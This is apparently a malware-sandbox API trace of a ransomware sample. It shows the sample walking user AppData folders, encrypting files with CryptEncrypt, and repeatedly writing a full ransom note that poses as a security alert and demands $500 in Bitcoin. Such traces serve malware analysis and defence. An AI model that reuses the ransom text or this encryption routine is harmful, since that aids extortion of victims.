secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.864] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.864] CloseHandle (hObject=0xd8) returned 1 [0089.864] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0089.865] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0089.865] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\RESTORE_FILES.txt") returned 78 [0089.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.865] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.865] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0089.866] lstrlenA (lpString="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") returned 684 [0089.866] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0089.866] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.866] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.867] CloseHandle (hObject=0xd4) returned 1 [0089.867] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.867] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0089.867] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files") returned -1 [0089.867] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files (x86)") returned -1 [0089.867] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0089.867] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0089.867] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned 59 [0089.867] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0089.867] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0089.867] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\*") returned 61 [0089.867] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0089.867] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.867] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.867] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.867] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.867] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.867] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\.") returned 61 [0089.867] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.867] StrStrIW (lpFirst=".", lpSrch=".protected") 
returned 0x0 [0089.867] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.867] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0089.867] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0089.867] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.868] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.868] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.868] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.868] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.868] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.868] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.868] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\..") returned 62 [0089.868] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.868] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.868] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.868] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.868] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0089.868] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: 
pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0089.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.868] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.868] lstrcmpiW (lpString1="AddIns", lpString2="Windows") returned -1 [0089.868] lstrcmpiW (lpString1="AddIns", lpString2="Program Files") returned -1 [0089.868] lstrcmpiW (lpString1="AddIns", lpString2="Program Files (x86)") returned -1 [0089.868] lstrcmpiW (lpString1="AddIns", lpString2="$Recycle.bin") returned 1 [0089.868] lstrcmpiW (lpString1="AddIns", lpString2="System Volume Information") returned -1 [0089.868] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns") returned 66 [0089.868] lstrcmpW (lpString1="AddIns", lpString2=".") returned 1 [0089.868] lstrcmpW (lpString1="AddIns", lpString2="..") returned 1 [0089.868] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\*") returned 68 [0089.868] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.869] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.869] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.869] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.869] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.869] lstrcmpiW (lpString1=".", lpString2="System Volume 
Information") returned -1 [0089.870] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\.") returned 68 [0089.870] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.870] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.870] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.870] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.870] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.870] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.870] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.870] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\..") returned 69 [0089.870] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.870] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.870] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.870] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.870] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\RESTORE_FILES.txt") returned 84 [0089.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\addins\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.871] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.871] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.871] lstrlenA (lpString="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") returned 684 [0089.872] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.872] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.872] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.872] CloseHandle (hObject=0xd8) returned 1 [0089.872] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.872] lstrcmpiW (lpString1="Credentials", lpString2="Windows") returned -1 [0089.872] lstrcmpiW (lpString1="Credentials", lpString2="Program Files") returned -1 [0089.872] lstrcmpiW (lpString1="Credentials", lpString2="Program Files (x86)") returned -1 [0089.872] lstrcmpiW (lpString1="Credentials", lpString2="$Recycle.bin") returned 1 [0089.872] lstrcmpiW (lpString1="Credentials", lpString2="System Volume Information") returned -1 [0089.872] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials") returned 71 [0089.872] lstrcmpW (lpString1="Credentials", lpString2=".") returned 1 [0089.872] lstrcmpW (lpString1="Credentials", lpString2="..") returned 1 [0089.872] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned 73 [0089.872] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.872] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.872] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.872] lstrcmpiW (lpString1=".", lpString2="Program Files 
(x86)") returned -1 [0089.872] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.872] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.872] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\.") returned 73 [0089.872] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.872] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.872] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.872] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0089.873] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0089.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\credentials\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.873] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.873] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.873] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.873] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.873] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.873] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.873] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\..") returned 74 [0089.873] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.873] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.873] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.873] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.873] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0089.873] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0089.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.874] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.874] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.874] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\RESTORE_FILES.txt") returned 89 [0089.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\credentials\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.875] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.875] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.876] lstrlenA (lpString="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") returned 684 [0089.876] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.876] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.876] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.876] CloseHandle (hObject=0xd8) returned 1 [0089.876] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.876] lstrcmpiW (lpString1="Crypto", lpString2="Windows") returned -1 [0089.876] lstrcmpiW (lpString1="Crypto", lpString2="Program Files") returned -1 [0089.876] lstrcmpiW (lpString1="Crypto", lpString2="Program Files (x86)") returned -1 [0089.876] lstrcmpiW (lpString1="Crypto", lpString2="$Recycle.bin") returned 1 [0089.876] lstrcmpiW (lpString1="Crypto", lpString2="System Volume Information") returned -1 [0089.876] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto") returned 66 [0089.876] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1 [0089.876] lstrcmpW (lpString1="Crypto", lpString2="..") returned 1 [0089.876] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned 68 [0089.876] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.877] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.877] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.877] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.877] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.877] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.877] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\.") returned 68 [0089.877] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.877] StrStrIW (lpFirst=".", 
lpSrch=".protected") returned 0x0 [0089.877] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.877] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0089.877] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0089.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.877] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.877] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.877] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.877] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.877] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.877] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.877] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\..") returned 69 [0089.877] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.877] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.877] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.877] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.877] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0089.877] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0089.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.878] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.878] lstrcmpiW (lpString1="RSA", lpString2="Windows") returned -1 [0089.878] lstrcmpiW (lpString1="RSA", lpString2="Program Files") returned 1 [0089.878] lstrcmpiW (lpString1="RSA", lpString2="Program Files (x86)") returned 1 [0089.878] lstrcmpiW (lpString1="RSA", lpString2="$Recycle.bin") returned 1 [0089.878] lstrcmpiW (lpString1="RSA", lpString2="System Volume Information") returned -1 [0089.878] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned 70 [0089.878] lstrcmpW (lpString1="RSA", lpString2=".") returned 1 